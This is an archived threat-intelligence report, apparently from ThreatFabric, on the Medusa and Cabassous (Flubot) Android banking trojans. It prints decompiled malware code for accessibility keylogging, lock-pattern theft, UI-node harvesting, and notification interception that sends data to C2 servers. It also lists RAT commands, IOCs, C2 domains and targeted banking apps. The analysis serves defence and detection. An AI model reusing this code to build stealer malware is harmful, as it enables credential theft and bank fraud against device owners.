{
	"id": "96c619d5-d7e6-4abd-b2d6-4895bd36b124",
	"created_at": "2026-04-06T01:30:38.705356Z",
	"updated_at": "2026-04-10T03:20:03.219153Z",
	"deleted_at": null,
	"sha1_hash": "aec37b3face55538e0e848b047e2584dd5f2661c",
	"title": "Partners-in-crime: Medusa and Cabassous attack banks side-by-side",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 102258,
	"plain_text": "Partners-in-crime: Medusa and Cabassous attack banks side-by-side\r\nPublished: 2024-10-01 · Archived: 2026-04-06 00:17:33 UTC\r\nMedusa: a marriage partner as gunslinger\r\nThe success of Cabassous’ (aka Flubot) distribution campaigns, that have been “SMiShing” different regions all over the\r\nworld for almost a year attracted the attention of another threat actor. Just like for Anatsa’s campaigns spotted by\r\nThreatFabric in May 2020, another powerful mobile banking Trojan, Medusa, is now being distributed through the same\r\nSMiShing service as Cabassous.\r\nOur Threat Intelligence shows that Medusa followed Cabassous with exactly the same app names, package names and\r\nsimilar icons:\r\nKeylogger\r\nMedusa authors implemented a simple accessibility-based keylogging, allowing the bot to get access to UI events, such as\r\nclicks, text inputs and focus events of all application on the infected device. This feature allows the actors to collect much\r\nmore than only user input, as it can also track actions performed on the UI and visualize the content shown in the\r\napplications. This enables the attackers to gain further insights into victim’s behavior and grants them ability to steal\r\ncredentials without having to resort to the use of phishing attacks.\r\nThe code powering the keylogger (including stealing the lock pattern) is visible in following snippet (simplified for\r\nunderstanding convenience):\r\n try {\r\n logTimestamp = new SimpleDateFormat(\"MM/dd/yyyy, HH:mm:ss z\", Locale.US).format(Calendar.getInstance().getTime());\r\n CharSequence packageName = accessibilityEvent.getPackageName();\r\n viewIdResourceName = \"\";\r\n logPackageName = packageName == null ? \"\" : accessibilityEvent.getPackageName().toString();\r\n worker.stealPattern(v17.getRootInActiveWindow());\r\n } catch (Exception unused_ex) {}\r\n try {\r\n logText = accessibilityEvent.getText().toString();\r\n viewIdResourceName = accessibilityEvent.getSource().getViewIdResourceName();\r\n } catch (Exception unused_ex) {}\r\n String logText = logText;\r\n String viewIdResourceName = viewIdResourceName;\r\n try {\r\n int eventType = accessibilityEvent.getEventType();\r\n if (eventType == 1) {\r\n logEventType = \"click\";\r\n }\r\n if (eventType == 8) {\r\n logEventType = \"focus\";\r\n }\r\n if (eventType == 16) {\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 1 of 12\n\nlogEventType = \"text\";\r\n }\r\n if (eventType == 0x2000) {\r\n logEventType = \"selchange\";\r\n }\r\n v17.sendKeylog(logPackageName, logTimestamp, logEventType, logText, viewIdResourceName);\r\n } catch (Exception unused_ex) {}...public void stealPattern(AccessibilityNodeInfo arg13) {\r\n String text;\r\n if (arg13.getPackageName().equals(\"com.android.systemui\")) {\r\n for (Object v0: arg13.findAccessibilityNodeInfosByViewId(\"com.android.systemui:id/lockPatternView\")) {\r\n AccessibilityNodeInfo accessibilityNodeInfo = (AccessibilityNodeInfo) v0;\r\n JSONArray jsonArray = new JSONArray();\r\n int index;\r\n for (index = 0; index \u003c accessibilityNodeInfo.getChildCount(); ++index) {\r\n if (!accessibilityNodeInfo.getChild(index).isClickable()) {\r\n JSONObject logAccessibilityNodeInfo = new JSONObject();\r\n Rect bounds = new Rect();\r\n accessibilityNodeInfo.getChild(index).getBoundsInScreen(bounds);\r\n try {\r\n text = accessibilityNodeInfo.getChild(index).getText().toString();\r\n } catch (Exception unused_ex) {\r\n text = \"\";\r\n }\r\n try {\r\n logAccessibilityNodeInfo.put(\"t\", bounds.top);\r\n logAccessibilityNodeInfo.put(\"l\", bounds.left);\r\n logAccessibilityNodeInfo.put(\"b\", bounds.bottom);\r\n logAccessibilityNodeInfo.put(\"r\", bounds.right);\r\n logAccessibilityNodeInfo.put(\"k\", text);\r\n jsonArray.put(logAccessibilityNodeInfo);\r\n } catch (JSONException unused_ex) {}\r\n }\r\n }\r\n if (jsonArray.length() \u003c= 0) {\r\n continue;\r\n }\r\n this.sendKeylog(accessibilityNodeInfo.getPackageName().toString(), \"\", \"pattern\", jsonArray.toString(), \"\"\r\n }\r\n }\r\n }\r\nAccessibility scripting\r\nAuthors of Medusa also implemented a simple but powerful scripting engine that is able to execute a sequence of\r\ncommands on the infected device. Combined with the media streaming feature, this provides the attackers with limited\r\nbut powerful RAT functionalities that allow them to interact with the infected device while monitoring them at the same\r\ntime.\r\nThe list of available actions is shown hereunder:\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 2 of 12\n\nCommands Description\r\nhome_key Performs HOME global action\r\nges Executes a specified gesture on the screen of the device\r\nfid_click Clicks on the UI element with the specified ID\r\nsleep Sleeps (waits) for the specified number of microseconds\r\nrecent_key Shows overview of the recent apps\r\nscrshot_key Performs TAKE_SCREENSHOT global action\r\nnotification_key Opens the active notifications\r\nlock_key Locks the screen\r\nback_key Performs BACK global action\r\ntext_click Clicks on the UI element that has specified text displayed\r\nfill_text Not implemented\r\nAccessibility events logging\r\nAnother rather powerful feature of Medusa banking trojan is event logging. With a special command from C2 Medusa\r\nstarts to recursively collect the information about the active window starting from the root node. Information of interest is\r\nsuch as but not limited to:\r\nnode bounds in screen coordinates (position of elements in the UI),\r\ntext of the node (the text inside an element),\r\nwhether this node is categorized as password (if the element is a field of type “password”)\r\nHaving all the data collected the actor is able to get a better understanding of the interface of different applications and\r\ntherefore implement relevant scenarios for accessibility scripting feature. Moreover, it allows actor(s) to have deeper\r\ninsight on the applications the victim uses and their typical usage, while also allowing TA(s) to intercept some private\r\ndata.\r\nThe following snippet shows the code that collects the information of active window going through its nodes:\r\npublic static JSONObject getInfoAboutNode(AccessibilityNodeInfo node, int arg7) {\r\n JSONObject jsonNodeInfo = new JSONObject();\r\n if (node == null) {\r\n return jsonNodeInfo;\r\n }\r\n try {\r\n ...\r\n if (node.getText() != null) {\r\n jsonNodeInfo.put(\"t\", node.getText());\r\n }\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 3 of 12\n\nif (node.getContentDescription() != null) {\r\n jsonNodeInfo.put(\"cd\", node.getText());\r\n }\r\n if (node.getViewIdResourceName() != null) {\r\n jsonNodeInfo.put(\"r\", node.getViewIdResourceName());\r\n }...\r\n if (node.isPassword()) {\r\n jsonNodeInfo.put(\"pass\", true);\r\n }...\r\n if (node.isVisibleToUser()) {\r\n jsonNodeInfo.put(\"vis\", true);\r\n }\r\n if (node.getChildCount() \u003e 0) {\r\n JSONArray jsonChildNodeInfo = new JSONArray();\r\n int childCounter = 0;\r\n while (childCounter \u003c node.getChildCount()) {\r\n AccessibilityNodeInfo childNode = node.getChild(childCounter);\r\n ++childCounter;\r\n jsonChildNodeInfo.put(WorkerAccessibilityService.getInfoAboutNode(childNode, arg7 + 1));\r\n }\r\n jsonNodeInfo.put(\"chi\", jsonChildNodeInfo);\r\n }\r\n }\r\n catch (Exception unused_ex) {}\r\nThreat actor \u0026 backend infrastructure\r\nWe have substantial evidence that indicates that the threat actor behind Medusa are from Turkey. In addition to the fact\r\nthat the actor has spoken Turkish on underground forums, ThreatFabric analysts have collected IP’s, browser details, and\r\nother threat intelligence to corroborate this initial hypothesis.\r\nThe panel used by actors to control Medusa is referred to as Ankatras. ThreatFabric analysts were able to retrieve the\r\ninformation about FLUDHL campaign, which in only 24 days was able to infect 1784 devices.\r\nMedusa has multiple botnets. The samples seen in side-by-side campaigns with Cabassous are identified by the actors\r\nthemselves with the tags FLUVOICE, FLUFLASH and FLUDHL (possibly as a reference to the corresponding\r\nCabassous/Flubot campaigns). All these botnets use two separate C2 backends to manage bots. The first is the fronting\r\nC2, to which bots connect to, while the second is the actual bot operator panel, used by operators to manage their\r\ndifferent botnets.\r\nThe most recent campaigns have more botnet tags as Medusa’s TA seems to have once again switched to another region.\r\nThe C2s remain the same, while the botnet tags are now “VIDEO”, “CRICKET”, “SIFIRIBNELIK” (translated from\r\nTurkish as “ZERO FAKE”), “PURO”. Based on the application names and masquerade used, we believe these campaigns\r\nto target mostly users from USA, Canada and Turkey.\r\nEvery minute the malware sends the statistics to the C2 about the notifications received. As a response it might receive a\r\ntemplate string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing\r\nCabassous authors to arbitrarly change notification content. The code snippet below shows the implementation of it in\r\nlatest Cabassous samples:\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 4 of 12\n\npublic void onNotificationPosted(StatusBarNotification sbn) {\r\n super.onNotificationPosted(sbn);...String title = sbn.getNotification().extras.getString(\"android.title\");\r\n String text = sbn.getNotification().extras.getString(\"android.text\");\r\n String packageName = sbn.getPackageName();\r\n Long timeout = (Long) p91564b42.notificationsTimeLogger.get(packageName);...\r\n if (v2 != null \u0026\u0026 (p91564b42.notifResponse != null \u0026\u0026 !p91564b42.notifResponse.isEmpty())) {\r\n try {\r\n if (((long) timeout) == 0 L) {\r\n p91564b42.notificationsTimeLogger.put(packageName, Long.valueOf(System.currentTimeMillis()));\r\n Integer sent2package = (Integer) p91564b42.notificationsCounter.get(packageName);\r\n if (sent2package == null) {\r\n sent2package = (int) 0;\r\n }\r\n p91564b42.notificationsCounter.put(packageName, Integer.valueOf(((int) sent2package) + 1));\r\n String appName = pd8474166.getAppName(this, packageName);\r\n String v8 = p91564b42.notifResponse.replaceAll(\"%APP%\", appName);\r\n p91564b42.notifResponse = v8;\r\n String v8_1 = v8.replaceAll(\"%TITLE%\", title);\r\n p91564b42.notifResponse = v8_1;\r\n p91564b42.notifResponse = v8_1.replaceAll(\"%TEXT%\", text);\r\n v2.f(this.getApplicationContext(), p91564b42.notifResponse);\r\n } else if (System.currentTimeMillis() - ((long) timeout) \u003e 2000 L) {\r\n p91564b42.notificationsTimeLogger.put(packageName, Long.valueOf(0 L));\r\n }\r\n } catch (PendingIntent.CanceledException v1) {}\r\n }\r\n if (p7e1b9eb1.isInterceptingNotif()) {\r\n p53cba4f5.sendToC2(\"LOG,NOTIF,\" + title + \": \" + text, Boolean.valueOf(true));\r\n this.cancelNotification(sbn.getKey());\r\n }\r\n}\r\nWe believe that this previously unseen capability can be used by actors to sign fraudulent transactions on victim’s behalf,\r\nthus making notifications non-reliable authentication/authorization factor on an infected device. Another potential\r\nabuse of this functionality could be to respond to social applications notifications with malicious phishing links.\r\nConsidering the popularity of these type of apps and the strong focus of Cabassous’ TA on distribution tactics, this could\r\neasily be the main MO behind this new Notification Direct Reply Abuse.\r\nConclusion\r\nMore and more actors follow Cabassous’ success in distribution tactics, appropriating masquerading techniques and using\r\nthe same distribution service. Despite the fact that Medusa is not extremely widespread at the moment, we do see an\r\nincrease in volume of campaigns and a sufficiently greater number of different campaigns.\r\nAt the same time, Cabassous keeps evolving, introducing new features and making another step towards being able to\r\nperform on-device fraud. This innovative feature (for banking malware) provides Cabassous’ actors with improved\r\ncontrol over intercepted notifications.\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 5 of 12\n\nThe evolution of malware families show that 2FA techniques might be not sufficient to ensure origin of transaction. It\r\nrequires deeper TI in combination with a solution that is able to detect malicious behaviour on customers devices.\r\nHow we help our customers\r\nThreatFabric makes it easier than it has ever been to run a secure mobile payments business. With the most advanced\r\nthreat intelligence for mobile banking, financial institutions can build a risk-based mobile security strategy and use this\r\nunique knowledge to detect fraud-by-malware on the mobile devices of customers in real-time.\r\nTogether with our customers and partners, we are building an easy-to-access information system to tackle the ever\r\ngrowing threat of mobile malware targeting the financial sector. We especially like to thank the Cyber Defence Alliance\r\n(CDA) and FS-ISAC for collaborating and proactively sharing knowledge and information across the financial sector to\r\nfight cyber-threats.\r\nThreatFabric has partnerships with TIPs all over the world.\r\nIf you want to request a free trial of our MTI-feed, or want to test our own MTI portal for 30 days, feel free to contact us\r\nat: sales@threatfabric.com\r\nIf you want more information on how we detect mobile malware on mobile devices, you can directly contact us\r\nat: info@threatfabric.com\r\nAppendix: IOC\r\nMedusa Samples\r\nApp\r\nname\r\nPackage name SHA-256\r\nVideo\r\nPlayer\r\ncom.xwlbouply.dbhxzcsgw fe3d38316dc38a4ec63eac80e34cb157c9d896460f9b7b3bfbd2cec4e2cb8cdc\r\nDHL com.iqiyi.i18n d83a06d5a41dd56b6cd3e9c3afef850ab07f176ae8f005759edb242daf7b9f38\r\nVoicemail com.qq.reader e2db34355df77e3c95e291a1374e4ba6a75d0da471ab9f929b9ef3424f824421\r\nFlash\r\nPlayer\r\ncom.thestore.main 75f1bebe19feba3914a7bbf95a8ce742cb709658c2105cf2ebe8cf7ef0c43f23\r\nAmazon\r\nLocker\r\ncom.autonavi.minimap b259fa47fc27728675a2629b98fbe4bb73c0b2216797a154f58c85f7578b3f4d\r\nMedusa C2\r\nC2\r\nessesessssssss.top\r\nsock.essesessssssss.top:20027\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 6 of 12\n\nC2\r\nnmnmnmfsamsfan.xyz\r\nsock.nmnmnmfsamsfan.xyz:20027\r\nunknknknnkknkknnk.xyz\r\nsock.unknknknnkknkknnk.xyz:20027\r\npembesir.xyz\r\nsock.pembesir.xyz:20027\r\nasfsafsakjfkjsa.xyz\r\nsock.asfsafsakjfkjsa.xyz:20027\r\nCabassous (Flubot) Samples\r\nApp\r\nname\r\nPackage name SHA-256\r\nDHL com.tencent.mobileqq df98a8b9f15f4c70505d7c8e0c74b12ea708c084fbbffd5c38424481ae37976f\r\nFlash\r\nPlayer\r\ncom.tencent.mobileqq 2213a4d0a8d3752ce6edde18c2562478dc73c2c618842ca7b158282a0e525972\r\nAmazon\r\nLocker\r\ncom.autonavi.minimap b2dafc4faea81f4addf1ac3a295627e9f7e1d36efa2a8b82a813d853cfcf87c4\r\nVoicemail com.qiyi.video a685fbeedd05341f0da64b774142c48ba68193a2a68fa42b3341038c26057e7c\r\nCabassous C2\r\nDomain\r\nfpuacswjcgpcxoe[.]ru\r\nueihtnoujbedjiu[.]ru\r\numxkexskgtctvws[.]cn\r\nAppendix: Targeted apps\r\nMedusa.B Targets for Flu botnet tags\r\nPlease note that target differ per botnet, Flu botnet tag focus is US, ES, TR Medusa has its own tags for Canada, which\r\ncontain Canadian banks as target.\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 7 of 12\n\nPackage Name App Name\r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa\r\ncom.woodforest Woodforest Mobile Banking\r\ncom.teb CEPTETEB\r\ncom.suntrust.mobilebanking SunTrust Mobile App\r\nes.univia.unicajamovil UnicajaMovil\r\nes.cm.android Bankia\r\ncom.ally.MobileBanking Ally Mobile\r\ncom.tmobtech.halkbank Halkbank Mobil\r\ncom.imaginbank.app imaginBank - Your mobile bank\r\nfinansbank.enpara Enpara.com Cep Şubesi\r\ncom.finansbank.mobile.cepsube QNB Finansbank Mobile Banking\r\ncom.tdbank TD Bank (US)\r\nes.evobanco.bancamovil EVO Banco móvil\r\nes.liberbank.cajasturapp Banca Digital Liberbank\r\ncom.schwab.mobile Schwab Mobile\r\nwww.ingdirect.nativeframe ING España. Banca Móvil\r\ncom.pozitron.iscep İşCep - Mobile Banking\r\ncom.ziraat.ziraatmobil Ziraat Mobile\r\ncom.citi.citimobile Citi Mobile®\r\nes.openbank.mobile Openbank – banca móvil\r\nbu.bir.test.uygulamasi TA testing app\r\ncom.citizensbank.androidapp Citizens Bank Mobile Banking\r\ncom.kuveytturk.mobil Kuveyt Türk\r\ncom.clairmail.fth Fifth Third Mobile Banking\r\ncom.rsi ruralvía\r\nes.ibercaja.ibercajaapp Ibercaja\r\ncom.bankinter.empresas Bankinter Empresas\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 8 of 12\n\nPackage Name App Name\r\ncom.botw.mobilebanking Bank of the West Mobile\r\ncom.denizbank.mobildeniz MobilDeniz\r\ncom.magiclick.odeabank Odeabank\r\norg.ncsecu.mobile SECU\r\ncom.infonow.bofa Bank of America Mobile Banking\r\ncom.mcom.firstcitizens First Citizens Mobile Banking\r\ncom.bmoharris.digital BMO Digital Banking\r\ncom.zellepay.zelle Zelle\r\ncom.vakifbank.mobile VakıfBank Mobil Bankacılık\r\ncom.compasssavingsbank.mobile Compass Savings Bank\r\ncom.ykb.android Yapı Kredi Mobile\r\ncom.morganstanley.clientmobile.prod Morgan Stanley Wealth Mgmt\r\ncom.wf.wellsfargomobile Wells Fargo Mobile\r\ncom.mfoundry.mb.android.mb_136 People’s United Bank Mobile\r\ntr.com.hsbc.hsbcturkey.uk HSBC Turkiye\r\ncom.grupocajamar.wefferent Grupo Cajamar\r\nes.bancosantander.apps Santander\r\ncom.key.android KeyBank Mobile\r\ncom.navyfederal.android Navy Federal Credit Union\r\ncom.mtb.mbanking.sc.retail.prod M\u0026T Mobile Banking\r\ncom.etrade.mobilepro.activity E*TRADE: Invest. Trade. Save.\r\ncom.akbank.android.apps.akbank_direkt Akbank\r\ncom.usaa.mobile.android.usaa USAA Mobile\r\ncom.pnc.ecommerce.mobile PNC Mobile\r\ncom.garanti.cepsubesi Garanti BBVA Mobile\r\ncom.americanexpress.android.acctsvcs.us Amex\r\ncom.ziraatkatilim.mobilebanking Katılım Mobil\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 9 of 12\n\nPackage Name App Name\r\ncom.bankinter.launcher Bankinter Móvil\r\ncom.discoverfinancial.mobile Discover Mobile\r\ncom.konylabs.capitalone Capital One® Mobile\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.kutxabank.android Kutxabank\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\nCabassous.D Targets\r\nPackage Name App Name\r\nau.com.cua.mb CUA Mobile Banking\r\nau.com.bankwest.mobile Bankwest\r\nco.zip Zip - Shop Now, Pay Later\r\norg.bom.bank Bank of Melbourne Mobile Banking\r\nuk.co.tescomobile.android Tesco Mobile\r\ncom.bankofqueensland.boq BOQ Mobile\r\nuk.co.tsb.newmobilebank TSB Mobile Banking\r\ncom.coinbase.android Coinbase – Buy \u0026 Sell Bitcoin. Crypto Wallet\r\norg.stgeorge.bank St.George Mobile Banking\r\nuk.co.mbna.cardservices.android MBNA - Card Services App\r\nuk.co.santander.santanderUK Santander Mobile Banking\r\ncom.adcb.bank ADCB\r\ncom.grppl.android.shell.BOS Bank of Scotland Mobile Banking: secure on the go\r\nuk.co.hsbc.hsbcukmobilebanking HSBC UK Mobile Banking\r\nau.com.suncorp.SuncorpBank Suncorp Bank\r\nau.com.macquarie.banking Macquarie Mobile Banking\r\ncom.binance.dev Binance - Buy \u0026 Sell Bitcoin Securely\r\ncom.barclays.android.barclaysmobilebanking Barclays\r\ncom.cbd.mobile CBD\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 10 of 12\n\nPackage Name App Name\r\ncom.fusion.banking Bank Australia app\r\ncom.grppl.android.shell.CMBlloydsTSB73 Lloyds Bank Mobile Banking: by your side\r\ncom.vipera.ts.starter.MashreqAE Mashreq UAE\r\norg.banksa.bank BankSA Mobile Banking\r\norg.banking.bom.businessconnect Bank of Melbourne Business App\r\nau.com.newcastlepermanent NPBS Mobile Banking\r\ncom.fusion.beyondbank Beyond Bank Australia\r\nau.com.nab.mobile NAB Mobile Banking\r\ncom.rbs.mobile.android.natwest NatWest Mobile Banking\r\ncom.commbank.netbank CommBank\r\ncom.anz.android.gomoney ANZ Australia\r\norg.banking.stg.businessconnect St.George Business App\r\ncom.virginmoney.cards Virgin Money Credit Card\r\nau.com.amp.myportfolio.android My AMP\r\nau.com.mebank.banking ME Bank\r\nenbd.mobilebanking Emirates NBD\r\ncom.cooperativebank.bank The Co-operative Bank\r\norg.westpac.bank Westpac Mobile Banking\r\ncom.rbs.mobile.android.rbs Royal Bank of Scotland Mobile Banking\r\nnz.co.kiwibank.mobile Kiwibank Mobile Banking\r\ntsb.mobilebanking TSB Bank Mobile Banking\r\nco.uk.Nationwide.Mobile Nationwide Banking App\r\nau.com.rams.RAMS myRAMS\r\norg.westpac.col Westpac Corporate Mobile\r\ncom.grppl.android.shell.halifax Halifax: the banking app that gives you extra\r\nnz.co.asb.asbmobile ASB Mobile Banking\r\nau.com.commbank.commbiz.prod CommBiz\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 11 of 12\n\nPackage Name App Name\r\ncom.bendigobank.mobile Bendigo Bank\r\norg.banking.bsa.businessconnect BankSA Business App\r\ncom.nearform.ptsb permanent tsb\r\ncom.greater.Greater Greater Bank\r\nnz.co.anz.android.mobilebanking ANZ goMoney New Zealand\r\nuk.co.metrobankonline.mobile.android.production Metro Bank\r\nau.com.ubank.internetbanking UBank Mobile Banking\r\ncom.anz.transactive.global ANZ Transactive - Global\r\nau.com.hsbc.hsbcaustralia HSBC Australia\r\nnz.co.westpac Westpac One (NZ) Mobile Banking\r\nSource: https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nhttps://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html"
	],
	"report_names": [
		"partners-in-crime-medusa-cabassous.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439038,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aec37b3face55538e0e848b047e2584dd5f2661c.pdf",
		"text": "https://archive.orkl.eu/aec37b3face55538e0e848b047e2584dd5f2661c.txt",
		"img": "https://archive.orkl.eu/aec37b3face55538e0e848b047e2584dd5f2661c.jpg"
	}
}